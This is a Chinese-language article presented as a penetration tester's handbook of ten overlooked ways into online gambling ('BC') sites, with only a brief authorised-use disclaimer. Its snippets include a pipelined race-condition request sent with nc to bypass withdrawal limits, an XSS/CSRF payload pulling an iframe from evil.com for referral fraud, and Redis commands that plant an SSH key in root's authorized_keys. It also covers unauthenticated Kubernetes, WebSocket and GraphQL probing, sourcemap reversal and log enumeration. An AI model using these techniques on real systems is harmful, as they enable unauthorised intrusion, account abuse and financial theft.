渗透工程师手册:10个被忽视的BC站点突破口
在安全攻防领域,BC站点因其特殊业务属性,往往部署了严密的安全防护体系。本文基于合法授权的渗透测试经验,揭示十个常被忽视的攻击面,为安全研究人员提供专业参考。(注:本文所述技术仅限授权测试场景使用)
一、子域名资产管理盲区
-
1. C段历史解析残留
通过DNSDB等历史记录查询工具,常可发现已下线但未注销的子域名解析记录,结合C段扫描可定位测试/备份环境 -
2. 泛解析证书泄露
利用censys.io检索*.domain.com证书,可发现非常规入口点(如:devops.domain.com、kibana.internal.domain.com)
二、API端点安全盲点
-
3. WebSocket协议鉴权缺失
部分实时赔率接口采用WS协议传输,测试时需特别检查:
import websockets async def test_ws_auth(): try: async with websockets.connect('wss://api.domain.com/live') as ws: await ws.send('{"action":"getOdds"}') # 未授权指令测试 print(await ws.recv()) except Exception as e: print(f"Connection failed: {e}")
-
4. GraphQL内省查询暴露
对/graphql端点执行内省查询,可能获取后台管理接口字段:
query { __schema { types { name fields { name } } } }
三、业务逻辑深层漏洞
-
5. 活动提现的并发竞争
利用HTTP管道化技术构造并发请求,可突破每日提现次数限制:
echo -e "POST /withdraw HTTP/1.1\r\n...\r\n\r\n POST /withdraw HTTP/1.1\r\n..." | nc target.com 443
-
6. 推广系统CSRF链式攻击
当推广链接存在self-XSS时,组合CSRF可实现自动化"发展下线":
<img src="https://target.com/invite?ref=attacker" onerror="document.write('<iframe src=//evil.com/csrf></iframe>')">
四、基础设施配置缺陷
-
7. K8s集群未鉴权访问
对6443端口执行API探测,可能发现开发环境未配置RBAC:
kubectl --insecure-skip-tls-verify=true --server=https://target.com:6443 get pods
-
8. Redis未授权访问组合利用
当发现6379开放时,可尝试写入SSH公钥:
config set dir /root/.ssh/ config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3NzaC...\n\n" save
五、隐蔽数据泄露路径
-
9. Webpack源码映射反编译
通过.map文件还原原始代码:
// 访问/main.js.map // 使用reverse-sourcemap工具还原 npm install reverse-sourcemap -g reverse-sourcemap --output-dir src main.js.map
-
10. 日志文件时序预测
部分系统采用日期格式命名日志文件:
https://cdn.domain.com/logs/20240815_access.log # 修改日期遍历下载